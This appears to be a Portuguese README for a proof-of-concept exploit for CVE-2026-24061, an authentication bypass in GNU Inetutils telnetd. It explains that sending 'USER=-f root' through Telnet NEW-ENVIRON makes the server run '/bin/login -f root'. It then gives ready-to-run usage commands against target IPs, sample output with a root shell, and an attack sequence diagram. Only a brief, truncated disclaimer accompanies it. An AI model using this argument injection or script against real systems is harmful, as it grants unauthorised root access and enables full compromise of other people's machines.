
Prova de conceito de exploit para bypass de autenticação no telnetd do GNU Inetutils (CVE-2026-24061) que gera um shell root por meio da variável USER NEW-ENVIRON manipulada.
Este repositório contém um exploit de Prova‑de‑Conceito para a vulnerabilidade de bypass de autenticação remota no GNU Inetutils telnetd.
O problema surge porque o telnetd sanitiza incorretamente a variável de ambiente USER recebida via negociação Telnet NEW‑ENVIRON antes de invocar o /bin/login.
Ao fornecer:
USER=-f root
o telnetd efetivamente executa:
/bin/login -f root
o que contorna a autenticação e gera um shell root imediato.
O Telnet NEW‑ENVIRON permite que clientes definam variáveis de ambiente durante a negociação da sessão.
O telnetd vulnerável passa USER diretamente para o login:
/bin/login -f "$USER"
Um atacante define:
USER=-f root
Resultado:
/bin/login -f root
A flag -f instrui o login a ignorar a autenticação, concedendo acesso root.
Nenhuma dependência externa necessária.
python3 cve-2026-24061.py 192.168.1.100
python3 cve-2026-24061.py example.com 23
Se vulnerável:
# id
uid=0(root) gid=0(root)
#
Você agora tem um shell root interativo.
python3 cve-2026-24061.py 10.10.10.20
Saída:
[+] Conectado a 10.10.10.20:23
[+] Enviado USER=-f root malicioso via NEW-ENVIRON
[+] Negociação concluída - entrando no shell interativo
#
sequenceDiagram
participant A as Atacante
participant T as telnetd alvo
participant L as /bin/login
participant R as Shell Root
A->>T: Conectar TCP/23
A->>T: Telnet NEW-ENVIRON USER=-f root
T->>L: Executar /bin/login -f root
L-->>T: Bypass de autenticação bem-sucedido
T-->>R: Gerar shell root
R-->>A: Sessão root interativaEste exploit é fornecido para:
O uso não autorizado contra sistemas que você não possui ou não tem permissão para testar é ilegal.